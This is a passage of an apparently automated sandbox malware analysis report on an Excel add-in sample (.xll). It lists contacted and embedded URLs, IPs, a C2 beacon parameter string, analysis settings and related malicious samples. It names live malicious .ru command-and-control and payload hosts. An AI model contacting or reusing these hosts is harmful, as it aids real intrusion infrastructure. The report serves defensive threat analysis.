              		unknown
              api.ipify.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://api.ipify.org/false
                  		high
                  http://thentabecon.ru/8/forum.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://anspossthrly.ru/8/forum.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://srand04rf.ru/08.jpgtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.diagnosticssdf.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                    		high
                    https://login.microsoftonline.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                      		high
                      https://shell.suite.office.com:1443F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                        		high
                        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                          		high
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00708_5355150121.xlltrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://autodiscover-s.outlook.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                            		high
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                              		high
                              https://cdn.entity.F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.addins.omex.office.net/appinfo/queryF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                		high
                                https://clients.config.office.net/user/v1.0/tenantassociationkeyF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                  		high
                                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                    		high
                                    https://powerlift.acompli.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://rpsticket.partnerservices.getmicrosoftkey.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://lookup.onenote.com/lookup/geolocation/v1F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                      		high
                                      https://cortana.aiF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                        		high
                                        https://cloudfiles.onenote.com/upload.aspxF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                          		high
                                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                            		high
                                            https://entitlement.diagnosticssdf.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                              		high
                                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                		high
                                                https://api.aadrm.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://ofcrecsvcapi-int.azurewebsites.net/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                  		high
                                                  https://api.microsoftstream.com/api/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                    		high
                                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                      		high
                                                      https://cr.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://srand04rf.ru/08powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://portal.office.com/account/?ref=ClientMeControlF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://graph.ppe.windows.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                		high
                                                                https://res.getmicrosoftkey.com/api/redemptioneventsF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://powerlift-frontdesk.acompli.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://tasks.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                  		high
                                                                  https://officeci.azurewebsites.net/api/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                    		high
                                                                    https://store.office.cn/addinstemplateF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmptrue
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://go.micropowershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmptrue
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                        		high
                                                                        https://globaldisco.crm.dynamics.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                          		high
                                                                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmptrue
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                            		high
                                                                            https://store.officeppe.com/addinstemplateF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://dev0-api.acompli.net/autodetectF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.odwebp.svc.msF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://api.powerbi.com/v1.0/myorg/groupsF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                              		high
                                                                              https://web.microsoftstream.com/video/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                		high
                                                                                https://graph.windows.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                  		high
                                                                                  https://dataservice.o365filtering.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://officesetup.getmicrosoftkey.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://analysis.windows.net/powerbi/apiF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                      		high
                                                                                      https://prod-global-autodetect.acompli.net/autodetectF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                        		high
                                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                          		high
                                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                            		high
                                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                              		high
                                                                                              https://ncus.contentsync.F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                		high
                                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                  		high
                                                                                                  http://weather.service.msn.com/data.aspxF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                    		high
                                                                                                    https://apis.live.net/v5.0/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                      		high
                                                                                                      http://srand04rf.rupowershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                        		high
                                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                          		high
                                                                                                          https://management.azure.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                            		high
                                                                                                            https://wus2.contentsync.F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://incidents.diagnostics.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                              		high
                                                                                                              http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUIDsnd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmptrue
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		low
                                                                                                              https://clients.config.office.net/user/v1.0/iosF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                		high
                                                                                                                http://ocsp.sectigo.com00708_5355150121.xlltrue
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://insertmedia.bing.office.net/odc/insertmediaF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                  		high
                                                                                                                  https://o365auditrealtimeingestion.manage.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                    		high
                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmptrue
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                      		high
                                                                                                                      https://api.office.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                        		high
                                                                                                                        https://incidents.diagnosticssdf.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                          		high
                                                                                                                          https://asgsmsproxyapi.azurewebsites.net/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                            		high
                                                                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0708_5355150121.xlltrue
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://entitlement.diagnostics.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                              		high
                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                		high
                                                                                                                                https://substrate.office.com/search/api/v2/initF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                    		high
                                                                                                                                    http://pesterbdd.com/images/Pester.png8powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmptrue
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://storage.live.com/clientlogs/uploadlocationF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://templatelogging.office.com/client/logF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://outlook.office365.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://webshell.suite.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://contoso.com/powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmptrue
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://management.azure.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://login.windows.net/common/oauth2/authorizeF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                  		high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  23.21.173.155
                                                                                                                                                  		elb097307-934924932.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                  		14618AMAZON-AESUSfalse
                                                                                                                                                  77.222.42.67
                                                                                                                                                  		sudepallon.comRussian Federation
                                                                                                                                                  		44112SWEB-ASRUtrue
                                                                                                                                                  8.211.241.0
                                                                                                                                                  		srand04rf.ruSingapore
                                                                                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                                                                  Private

                                                                                                                                                  IP
                                                                                                                                                  192.168.2.1

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:445958
                                                                                                                                                  Start date:08.07.2021
                                                                                                                                                  Start time:16:29:13
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 8m 20s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:0708_5355150121.xll
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:28
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLL@10/11@4/4
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 3% (good quality ratio 2.9%)
                                                                                                                                                  • Quality average: 88.5%
                                                                                                                                                  • Quality standard deviation: 21.2%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 75%
                                                                                                                                                  • Number of executed functions: 59
                                                                                                                                                  • Number of non-executed functions: 76
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xll
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.42.151.234, 13.88.21.125, 52.109.88.177, 52.109.12.21, 52.147.198.201, 20.82.210.154, 2.20.84.85, 51.103.5.186, 20.82.209.183, 95.101.22.134, 95.101.22.125, 40.112.88.60, 92.122.145.220
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  16:30:52API Interceptor50x Sleep call for process: powershell.exe modified
                                                                                                                                                  16:31:54API Interceptor91x Sleep call for process: snd32sys.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  23.21.173.155file.docGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  77.222.42.67triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  elb097307-934924932.us-east-1.elb.amazonaws.comOTzccW5OZg.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.226.23
                                                                                                                                                  ve88CBNzQZ.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.211.162
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.121.178
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.246.238
                                                                                                                                                  0706_1715044809783.docGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  niberius.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.225.78.40
                                                                                                                                                  4h2yLkN8DO.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  TejsR02giJ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  juON02msHS.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  B6tFTmWwt8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  Y0Cc092A1t.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  02ZEulFtpQ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.121.178
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  srand04rf.ruaCWkTdaR6G.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  0616_433887484261.docGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omsh.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omsh_.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omh.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  0616_1338797754728.docGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  SWEB-ASRUtriage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  jax.k.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_28522894410229.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_1488782409783.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_17568640710485.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_4618771472215.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_1488782409783.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  jax.k.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  180000.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  jax.k.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  HZHWEk01Ts.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.40.109
                                                                                                                                                  pT4uZ7ExfU.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.40.139
                                                                                                                                                  bid,11.20.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.55.176
                                                                                                                                                  AMAZON-AESUSOTzccW5OZg.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  ve88CBNzQZ.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                                                                                                                                                  • 3.223.125.168
                                                                                                                                                  FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                                                                                                                                                  • 3.223.125.168
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.225.245.108
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
